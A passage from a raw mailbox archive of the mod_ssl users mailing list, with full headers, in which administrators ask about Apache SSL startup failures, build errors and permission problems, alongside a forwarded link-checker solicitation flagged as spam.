b=exJ07RMO5+46ZLi9yrKDwL6Agj1C8PJrsXozduclJkdPNTN6Rii0kooiSeOcUdUUUvU8805VeyV4Gooo+ue5YkJcaVJ4/RoT3j5qAIs3JLqdOkGs9tdSulVg+MgzugIZIva/4aoLPQTVcAbqGS+hkK+BYYNknL+553JAFhAf8Ic= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding; b=t6lajVnuA90uef87c54r7fgLsdlTsMEwJEP/PMN/oJ5WD93OdvXacjYEA/8ELdUXDpKZ1P2mvpxLF2HAPyG0L4EMhiazLCjBm1OT45Cu+qxsesmPK9pBIP6mD2r2Rt951XfIN7FoH7kQUDQGNCcpd4hyL6Mhr9E+hrAuKnV1QVg= Received: by 10.82.149.8 with SMTP id w8mr1910228bud.24.1197988796680; Tue, 18 Dec 2007 06:39:56 -0800 (PST) Received: from H-yager-052907.local ( [192.204.19.245]) by mx.google.com with ESMTPS id g9sm6254678gvc.2007.12.18.06.39.54 (version=TLSv1/SSLv3 cipher=RC4-MD5); Tue, 18 Dec 2007 06:39:55 -0800 (PST) Message-ID: <4767DB5E.7040805@gmail.com> Date: Tue, 18 Dec 2007 09:38:22 -0500 From: "Heather M. Yager" User-Agent: Thunderbird 2.0.0.9 (Macintosh/20071031) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: apache 2.0 fails on startup with SSL (no console or log errors found!) Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Heather M. Yager" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Hi list folk! I'm having trouble getting mod_ssl working on a fresh install of apache 2.0 on SUSE Linux 9. The problem: when I start apache with 'APACHE_SERVER_FLAGS="-D SSL"' in my sysconfig/apache2 file, it fails with no explanation: no errors in the error log, no errors on the console, other than returning "failed". When I start apache without "-D SSL", it runs with no problem, and I can use port 443 - it just points to the default location on my server. Running "apache extreme-configtest" yields "Syntax: OK". This is the first time I've set up a secure site, so I assume I'm either missing something obvious or subtle... any help or advice is most appreciated! My configuration: ---> my sysconfig/apache2 file contains: APACHE_SERVER_FLAGS="-D SSL" APACHE_MODULES="... ssl ..." (Consequently... "LoadModule ssl_module /usr/lib/apache2-prefork/mod_ssl.so" is in my loadmodule.conf) ---> My VHost file contains: DocumentRoot (my path) ServerName *:443 ErrorLog /var/log/apache2/error_log TransferLog /var/log/apache2/access_log SSLEngine on SSLCipherSuite (default) SSLCertificateFile /etc/apache2/ssl.crt/server.crt SSLCertificateKeyFile /etc/apache2/ssl.key/server.key SSLOptions +StdEnvVars SSLOptions +StdEnvVars CustomLog /var/log/apache2/ssl_request_log ssl_combined The certificate files are pointing to the correct place, and I've created self-signed keys/certs several times in several places with several different methods - to no effect - and am somewhat confident that the keys/certs are not the problem. ---> My "Directory" directive for the SSL document root directory contains: SSLRequireSSL SSLOptions +StdEnvVars Options Includes AllowOverride All Order allow,deny Allow from all ---> My ssl-global.conf file contains: AddType application/x-x509-ca-cert .crt AddType application/x-pkcs7-crl .crl SSLPassPhraseDialog builtin SSLSessionCache dbm:/var/lib/apache2/ssl_scache SSLSessionCacheTimeout 600 SSLMutex file:/var/lib/apache2/ssl_mutex SSLRandomSeed startup builtin SSLRandomSeed connect builtin Thanks for any help you can give! Heather Yager Database Programmer, Academy of Natural Sciences ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Dec 19 16:45:38 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 7007914DA31; Wed, 19 Dec 2007 16:45:38 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from auxmail.auxs.umn.edu (auxmail.auxs.umn.edu [134.84.35.222]) by master.modssl.org (Postfix) with ESMTP id 0C3ED14D850 for ; Wed, 19 Dec 2007 16:45:37 +0100 (CET) To: modssl-users@modssl.org Subject: mod_ssl-2.8.30-1.3.39 w/ mm-1.4.2 on mac os 10.4 issues MIME-Version: 1.0 X-Mailer: Lotus Notes Release 7.0.2 September 26, 2006 Message-ID: From: furyx001@umn.edu Date: Wed, 19 Dec 2007 09:45:25 -0600 X-MIMETrack: Serialize by Router on auxmail/umn(Release 7.0.2FP2|May 14, 2007) at 12/19/2007 09:45:26 AM, Serialize complete at 12/19/2007 09:45:26 AM Content-Type: multipart/alternative; boundary="=_alternative 00568E5D862573B6_=" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: furyx001@umn.edu X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users This is a multipart message in MIME format. --=_alternative 00568E5D862573B6_= Content-Type: text/plain; charset="US-ASCII" Hi, I am trying to run Apache 1.3.39 with mod_ssl 2.8.30, openssl 0.9.8g and mm 1.4.2. I am able to successfully compile it, but when I start Apache in SSL mode, it exits immediately. Looking in the error log, I see the following message: dyld: lazy symbol binding failed: Symbol not found: _SSL_CTX_sess_set_new_cb Referenced from: /usr/local/apache-1.3.39/libexec/libssl.so Expected in: flat namespace Can anyone help me in resolving why this is happening? Thanks, Bob --=_alternative 00568E5D862573B6_= Content-Type: text/html; charset="US-ASCII"
Hi,

I am trying to run Apache 1.3.39 with mod_ssl 2.8.30, openssl 0.9.8g and mm 1.4.2.  I am able to successfully compile it, but when I start Apache in SSL mode, it exits immediately.  Looking in the error log, I see the following message:

dyld: lazy symbol binding failed: Symbol not found: _SSL_CTX_sess_set_new_cb
 Referenced from: /usr/local/apache-1.3.39/libexec/libssl.so
 Expected in: flat namespace

Can anyone help me in resolving why this is happening?

Thanks,
Bob --=_alternative 00568E5D862573B6_=-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Dec 19 22:10:07 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id BA66714DA3C; Wed, 19 Dec 2007 22:10:07 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from n9.bullet.re3.yahoo.com (n9.bullet.re3.yahoo.com [68.142.237.94]) by master.modssl.org (Postfix) with SMTP id 3073014DA39 for ; Wed, 19 Dec 2007 22:10:06 +0100 (CET) Received: from [68.142.237.88] by n9.bullet.re3.yahoo.com with NNFMP; 19 Dec 2007 21:09:54 -0000 Received: from [216.252.122.217] by t4.bullet.re3.yahoo.com with NNFMP; 19 Dec 2007 21:09:54 -0000 Received: from [69.147.65.157] by t2.bullet.sp1.yahoo.com with NNFMP; 19 Dec 2007 21:09:53 -0000 Received: from [127.0.0.1] by omp405.mail.sp1.yahoo.com with NNFMP; 19 Dec 2007 21:09:53 -0000 X-Yahoo-Newman-Property: ymail-3 X-Yahoo-Newman-Id: 853009.8314.bm@omp405.mail.sp1.yahoo.com Received: (qmail 56683 invoked by uid 60001); 19 Dec 2007 21:09:53 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID; b=qtoYEKBj9BwQL+MB0hNqCMo2j5PJXox9BNqLGl77jTTbE91Ao4QMCtz+tdb2lkoKPRKRVknkGmqvdjfilWVOaFcpYCpbzjGxuK16/teJNbP9GFCjeZDpIKnjWGLxCtCNlpRFZTB55fvGIh8bmA3XybrJRuyMUSiFmnmqA8l2tWs=; X-YMail-OSG: YEuIic4VM1kWWkZubI7FX1r0Fs100..7QMs61xzp Received: from [192.88.158.212] by web43132.mail.sp1.yahoo.com via HTTP; Wed, 19 Dec 2007 13:09:48 PST Date: Wed, 19 Dec 2007 13:09:48 -0800 (PST) From: Orville Weyrich - KD7HJV Subject: Apache 2.2.6 mod_ssl won't serve subdirectories To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Message-ID: <753361.56433.qm@web43132.mail.sp1.yahoo.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Orville Weyrich - KD7HJV X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users This is my first experience with SSL. I have done the Google thing and searched Apache FAQ etc but found nothing regarding my problem. In a nutshell, I have the following file structure: /var/ssl/www/index.html /var/ssl/www/budget/index.html Everything in both paths is owned by root and either 755 or 644 as appropriate for directories and files. I have the server working for /var/ssl/www/index.html but I get a "HTTP Error 403 - Forbidden" error trying to view /var/ssl/www/budget/index.html The logs are uninformative as to WHY access to /var/ssl/www/budget/index.html is being forbidden. My impression was that subdirectories should inherit the access rights of their parent if I do nothing to override that behavior. I have an http server configured similarly running in the same instance of Apache 2.2.6 (on port 2080 so as to not conflict with my production web site running on port 80). It works as expected, including acces to subdirectories. The URLs are https://daniel.ameriroots.com and http://daniel.ameriroots.com:2080 I have reduced the httpd.conf file to the following essentials (this is what is presently running on the above URLs): ################################################################################# # Main Server Configuration ################################################################################# ServerRoot /usr/daniel/apache2 ServerName danniel.ameriroots.com ServerAdmin www@daniel.ameriroots.com Listen 64.249.12.251:2080 Listen 64.249.12.251:443 User www Group www Options FollowSymLinks AllowOverride None Order deny,allow Deny from all DirectoryIndex index.html Order allow,deny Deny from all Satisfy All LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined LogFormat "%h %l %u %t \"%r\" %>s %b" common ErrorLog /var/log/apache_error_log2 LogLevel info CustomLog /var/log/apache_access_log2 combined ################################################################################# # HTTP SERVER ON PORT 2080 ################################################################################# ErrorLog /var/log/http_error_log2 LogLevel info CustomLog /var/log/http_access_log2 combined DocumentRoot /var/www Allow from all ################################################################################# # HTTPS SERVER ON PORT 443 ################################################################################# SSLCertificateFile /var/ssl/conf/daniel.crt SSLCertificateKeyFile /var/ssl/conf/daniel.key SSLEngine On CustomLog /var/log/https_access_log2 combined ErrorLog /var/log/https_error_log2 LogLevel info BrowserMatch ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 DocumentRoot /var/ssl/www Allow from all The log files are unenlightening, even at debug level where I get lots of detail on SSL calculations, but a simple access denied message on the file itself. What am I missing here? ____________________________________________________________________________________ Never miss a thing. Make Yahoo your home page. http://www.yahoo.com/r/hs ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Dec 20 06:30:00 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 7968814D86A; Thu, 20 Dec 2007 06:30:00 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from n4.bullet.ukl.yahoo.com (n4.bullet.ukl.yahoo.com [217.146.182.181]) by master.modssl.org (Postfix) with SMTP id C541914D839 for ; Thu, 20 Dec 2007 06:29:59 +0100 (CET) Received: from [217.12.4.215] by n4.bullet.ukl.yahoo.com with NNFMP; 20 Dec 2007 05:29:47 -0000 Received: from [216.252.122.218] by t2.bullet.ukl.yahoo.com with NNFMP; 20 Dec 2007 05:29:47 -0000 Received: from [69.147.65.169] by t3.bullet.sp1.yahoo.com with NNFMP; 20 Dec 2007 05:29:47 -0000 Received: from [127.0.0.1] by omp504.mail.sp1.yahoo.com with NNFMP; 20 Dec 2007 05:29:47 -0000 X-Yahoo-Newman-Property: ymail-3 X-Yahoo-Newman-Id: 193560.3864.bm@omp504.mail.sp1.yahoo.com Received: (qmail 78982 invoked by uid 60001); 20 Dec 2007 05:29:46 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID; b=mmRXjAfBxpXp7zbrwfacWm0KrvMlZiH4Ze8ZKe1chHqI3JAb4ISAaCvf7Z2//hjjdwrMFFMeN2OsqRxD39YVvelOGAfA6mWo+s3HWKVr4mvPN60zj4Vh8P0wqQbL8AokpedUM1VUUFCO7k9scRLEyK+jcLvnicrZ3JrDuztpSC8=; X-YMail-OSG: tplHrOIVM1m44cSNWlHeL..8GHCAw9DWkClahx8aVw6BIHTTz7jGuWtXo2kEA6fsh.lfhkNPvSSe3uZBtOTFWdNdLBLJ1dWw8j_XTrmrgUzNeANTQ6qYtjn.PiPNGA-- Received: from [64.249.12.252] by web43145.mail.sp1.yahoo.com via HTTP; Wed, 19 Dec 2007 21:29:46 PST Date: Wed, 19 Dec 2007 21:29:46 -0800 (PST) From: Orville Weyrich - KD7HJV Subject: SOLVED: Apache 2.2.6 mod_ssl won't serve subdirectories To: modssl-users@modssl.org In-Reply-To: <753361.56433.qm@web43132.mail.sp1.yahoo.com> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Message-ID: <924342.78760.qm@web43145.mail.sp1.yahoo.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Orville Weyrich - KD7HJV X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Problem found and fixed - after getting some sleep I checked for about the 5th time and found the problem - the directory "budget" had permission 644 instead of 755. Stupid me :-( --- Orville Weyrich - KD7HJV wrote: > In a nutshell, I have the following file structure: > > /var/ssl/www/index.html > /var/ssl/www/budget/index.html > > Everything in both paths is owned by root and either > 755 or 644 as appropriate for directories and files. ____________________________________________________________________________________ Looking for last minute shopping deals? Find them fast with Yahoo! Search. http://tools.search.yahoo.com/newsearch/category.php?category=shopping ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Dec 20 20:37:49 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 4CE9B14D889; Thu, 20 Dec 2007 20:37:49 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from auxmail.auxs.umn.edu (auxmail.auxs.umn.edu [134.84.35.222]) by master.modssl.org (Postfix) with ESMTP id 7061614D839; Thu, 20 Dec 2007 20:37:47 +0100 (CET) In-Reply-To: To: modssl-users@modssl.org Cc: modssl-users@modssl.org, owner-modssl-users@modssl.org Subject: Re: mod_ssl-2.8.30-1.3.39 w/ mm-1.4.2 on mac os 10.4 issues MIME-Version: 1.0 X-Mailer: Lotus Notes Release 7.0.2 September 26, 2006 Message-ID: From: furyx001@umn.edu Date: Thu, 20 Dec 2007 13:37:36 -0600 X-MIMETrack: Serialize by Router on auxmail/umn(Release 7.0.2FP2|May 14, 2007) at 12/20/2007 01:37:36 PM, Serialize complete at 12/20/2007 01:37:36 PM Content-Type: multipart/alternative; boundary="=_alternative 006BCEF9862573B7_=" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: furyx001@umn.edu X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users This is a multipart message in MIME format. --=_alternative 006BCEF9862573B7_= Content-Type: text/plain; charset="US-ASCII" I've found a solution to this problem. You have to use the version of OpenSSL installed on your machine. In my case, it's 0.9.7l (the latest version Apple is supporting). When I tried configuring mod_ssl with SSL_BASE=SYSTEM, it failed saying it couldn't find the OpenSSL libraries. So I grabbed the latest version of OpenSSL (0.9.8g) and compiled against that. After a lot of digging, I came across this old post (2002) by David Wheeler: http://www.mail-archive.com/modssl-users@modssl.org/msg15623.html This fixed my problem after manually applying the patch. Is there any reason this wasn't applied to mod_ssl 5 years ago or addressed at all? Thanks! Bob furyx001@umn.edu Sent by: owner-modssl-users@modssl.org 12/19/2007 09:45 AM Please respond to modssl-users@modssl.org To modssl-users@modssl.org cc Subject mod_ssl-2.8.30-1.3.39 w/ mm-1.4.2 on mac os 10.4 issues Hi, I am trying to run Apache 1.3.39 with mod_ssl 2.8.30, openssl 0.9.8g and mm 1.4.2. I am able to successfully compile it, but when I start Apache in SSL mode, it exits immediately. Looking in the error log, I see the following message: dyld: lazy symbol binding failed: Symbol not found: _SSL_CTX_sess_set_new_cb Referenced from: /usr/local/apache-1.3.39/libexec/libssl.so Expected in: flat namespace Can anyone help me in resolving why this is happening? Thanks, Bob --=_alternative 006BCEF9862573B7_= Content-Type: text/html; charset="US-ASCII"
I've found a solution to this problem.  You have to use the version of OpenSSL installed on your machine.  In my case, it's 0.9.7l (the latest version Apple is supporting).  When I tried configuring mod_ssl with SSL_BASE=SYSTEM, it failed saying it couldn't find the OpenSSL libraries.  So I grabbed the latest version of OpenSSL (0.9.8g) and compiled against that.

After a lot of digging, I came across this old post (2002) by David Wheeler: http://www.mail-archive.com/modssl-users@modssl.org/msg15623.html

This fixed my problem after manually applying the patch.  Is there any reason this wasn't applied to mod_ssl 5 years ago or addressed at all?

Thanks!

Bob


I noticed that your page: http://www.modssl.org/docs/2.8/ssl_faq.html  
contained a link to: http://www.certisign.com.br/.

On Thu Mar 14, 2002 at 12:03:09 AM EST the page at http://www.certisign.com.br/ could not be accessed because of the following error: Time Out. 

Please note: Unless the broken link points to your website, this is not a problem with your web site.
I work for InternetSeer, a Web site monitoring company. InternetSeer is conducting an ongoing study of web connectivity. As recommended by the Robots Guidelines, this email is being sent to explain our research activities and to let you know about the difficulty in connecting to your site.

Your page was last examined on Tue Aug 28, 2001 at 10:56:32 PM EDT. If your page has not been updated since Tue Aug 28, 2001 at 10:56:32 PM EDT, this link is most likely currently broken.

The error listed above was initially detected by our primary site monitor in Philadelphia, Pa. then verified by our secondary site monitor located in Los Angeles, Ca. before this error event was recorded.

InternetSeer is the largest FREE web site monitoring company in the world. We provide free web site monitoring to over 1 million users worldwide. We'll monitor your web site every hour, 7 days a week, 24 hours a day for free.

To have InternetSeer monitor your web site for free, click here for instant signup.

As part of your free web site monitoring, you'll receive immediate notifications when we encounter problems accessing your web site and weekly performance reports.

InternetSeer does not store or publish the content of your pages, but rather uses availability and link information for our research.

Click here to learn more about InternetSeer.

Sincerely,

Cindy Jordan
Web Site Analyst
InternetSeer

If you prefer not to receive any further alerts regarding regarding the availability of your Web site, click here to cancel, or reply to this message with the word "cancel" in the subject line.
##modssl-users@modssl.org##
SRC=29 ------=_Part_13335_4870674.1016082232430-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 14 21:19:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA00913; Thu, 14 Mar 2002 21:18:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA00635; Thu, 14 Mar 2002 21:16:26 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 579D74CE74E; Thu, 14 Mar 2002 21:16:25 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2EJngK01771; Thu, 14 Mar 2002 20:49:42 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id UAA27586; Thu, 14 Mar 2002 20:08:07 +0100 (MET) Date: Thu, 14 Mar 2002 20:08:07 +0100 (MET) Message-Id: <200203141908.UAA27586@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] compilation problem with Allaire Jrun and EAPI (PR#674) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Brian Chen Version: 2.8.6 OS: linux Submission from: (NULL) (63.203.135.108) After I install the apache everything works fine but it crashes sometimes and I noticed this in the error log for the web server. [Thu Mar 14 03:29:16 2002] [warn] Loaded DSO /usr/local/jrun/connectors/apache/intel-linux/mod_jrun.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) Can you tell me how to disable EAPI in the mod_ssl build? Thanks Brian ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 15 06:58:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA00960; Fri, 15 Mar 2002 06:57:34 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail4.nc.rr.com id GAA00940; Fri, 15 Mar 2002 06:56:48 +0100 (MET) Received: from gold.krumpli.com ([24.25.14.8]) by mail4.nc.rr.com with Microsoft SMTPSVC(5.5.1877.687.68); Fri, 15 Mar 2002 00:57:15 -0500 Received: from dino (dino.krumpli.com [192.168.10.1]) by gold.krumpli.com (8.11.6/8.11.6) with ESMTP id g2F5tra99198 for ; Fri, 15 Mar 2002 00:55:54 -0500 (EST) (envelope-from tporter@dtool.com) From: "Thomas Porter, Ph.D." To: Subject: RE: Broken link on your website Date: Fri, 15 Mar 2002 00:56:45 -0500 Message-ID: <000501c1cbe6$30ce7d40$010aa8c0@krumpli.com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0006_01C1CBBC.47F87540" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <5383652.1016082232430.JavaMail.promon@pm68> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Thomas Porter, Ph.D." X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0006_01C1CBBC.47F87540 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit This is a large, well-known spamhaus... -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Cindy Jordan Sent: Thursday, March 14, 2002 12:04 AM To: modssl-users@modssl.org Subject: Broken link on your website I noticed that your page: http://www.modssl.org/docs/2.8/ssl_faq.html contained a link to: http://www.certisign.com.br/. On Thu Mar 14, 2002 at 12:03:09 AM EST the page at http://www.certisign.com.br/ could not be accessed because of the following error: Time Out. Please note: Unless the broken link points to your website, this is not a problem with your web site. I work for InternetSeer, a Web site monitoring company. InternetSeer is conducting an ongoing study of web connectivity. As recommended by the Robots Guidelines, this email is being sent to explain our research activities and to let you know about the difficulty in connecting to your site. Your page was last examined on Tue Aug 28, 2001 at 10:56:32 PM EDT. If your page has not been updated since Tue Aug 28, 2001 at 10:56:32 PM EDT, this link is most likely currently broken. The error listed above was initially detected by our primary site monitor in Philadelphia, Pa. then verified by our secondary site monitor located in Los Angeles, Ca. before this error event was recorded. InternetSeer is the largest FREE web site monitoring company in the world. We provide free web site monitoring to over 1 million users worldwide. We'll monitor your web site every hour, 7 days a week, 24 hours a day for free. To have InternetSeer monitor your web site for free, click here for instant signup. As part of your free web site monitoring, you'll receive immediate notifications when we encounter problems accessing your web site and weekly performance reports. InternetSeer does not store or publish the content of your pages, but rather uses availability and link information for our research. Click here to learn more about InternetSeer. Sincerely, Cindy Jordan Web Site Analyst InternetSeer _____ If you prefer not to receive any further alerts regarding regarding the availability of your Web site, click here to cancel, or reply to this message with the word "cancel" in the subject line. ##modssl-users@modssl.org## SRC=29 ------=_NextPart_000_0006_01C1CBBC.47F87540 Content-Type: text/html; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable Message
This=20 is a large, well-known spamhaus...
-----Original Message-----
From:=20 owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] = On=20 Behalf Of Cindy Jordan
Sent: Thursday, March 14, 2002 = 12:04=20 AM
To: modssl-users@modssl.org
Subject: Broken = link on=20 your website

------=_NextPart_000_0006_01C1CBBC.47F87540-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 15 10:53:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA11116; Fri, 15 Mar 2002 10:52:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA10992; Fri, 15 Mar 2002 10:49:36 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id EAF8D4CE618; Fri, 15 Mar 2002 10:49:35 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2F95Wj15190; Fri, 15 Mar 2002 10:05:32 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id BAA16288; Fri, 15 Mar 2002 01:56:17 +0100 (MET) Date: Fri, 15 Mar 2002 01:56:17 +0100 (MET) Message-Id: <200203150056.BAA16288@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] Apache/mod_ssl compilation error (PR#675) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Haihong Wang Version: 2.8.7-1.3.23 OS: RedHat 7.1 Submission from: (NULL) (128.107.253.38) Using the following source code packages: apache_1.3.23 mod_ssl-2.8.7-1.3.23 openssl-0.9.6c OS RedHat 7.1, gcc v3.0 Compilation of openssl ok, configuration of mod_ssl is fine. But while compiling Apache, I got the following error: ===> src/modules/ssl gcc -c -I../../os/unix -I../../include -O2 -g -DLINUX=22 -DMOD_SSL=208107 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT -I../../lib/expat-lite `../../apaci` -fpic -DSHARED_MODULE -I/home/whh/apache_1.3.23/openssl-0.9.6c/result/include -DMOD_SSL_VERSION=\"2.8.7\" mod_ssl.c && mv mod_ssl.o mod_ssl.lo In file included from mod_ssl.c:65: mod_ssl.h:349:18: ndbm.h: No such file or directory make[4]: *** [mod_ssl.lo] Error 1 make[3]: *** [all] Error 1 make[2]: *** [subdirs] Error 1 make[2]: Leaving directory `/home/whh/apache_1.3.23/apache_1.3.23/src' make[1]: *** [build-std] Error 2 make[1]: Leaving directory `/home/whh/apache_1.3.23/apache_1.3.23' make: *** [build] Error 2 This is the config command line I used for Apache: SSL_BASE=../openssl-0.9.6c/result/ OPTIM="-O2 -g" ./configure --enable-module=ssl --prefix=/home/whh/apache_1.3.23/apache_1.3.23/result/ --enable-shared=ssl --disable-rule=SSL_COMPAT --enable-rule=SSL_SDBM ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 15 13:14:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA19649; Fri, 15 Mar 2002 13:13:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id NAA19623; Fri, 15 Mar 2002 13:12:45 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 50FA44CE6E0; Fri, 15 Mar 2002 13:12:45 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2FBW1o36196; Fri, 15 Mar 2002 12:32:01 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id LAA13692; Fri, 15 Mar 2002 11:37:05 +0100 (MET) Date: Fri, 15 Mar 2002 11:37:05 +0100 (MET) Message-Id: <200203151037.LAA13692@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] got fatal: relocation error in solaris 8 (PR#676) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Ian Dimaunahan Version: mod_ssl-2.8.7 OS: Solaris 8 Submission from: (NULL) (203.131.77.51) hi all! i'm getting this error when starting my apache 1.3.23/mod_ssl-2.8.7 install in solaris 8 Syntax error on line 206 of /usr/local/apache/conf/httpd.conf: Cannot load /usr/local/apache/libexec/libssl.so into server: ld.so.1: /usr/local/apache/bin/httpd: fatal: relocation error: file /usr/local/apache/libexec/libssl.so: symbol ap_user_id: referenced symbol not found ./apachectl startssl: httpd could not be started openssl version 0.96c gcc version 2.95.3 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 15 13:37:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA20533; Fri, 15 Mar 2002 13:36:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from area.alsernet.es id 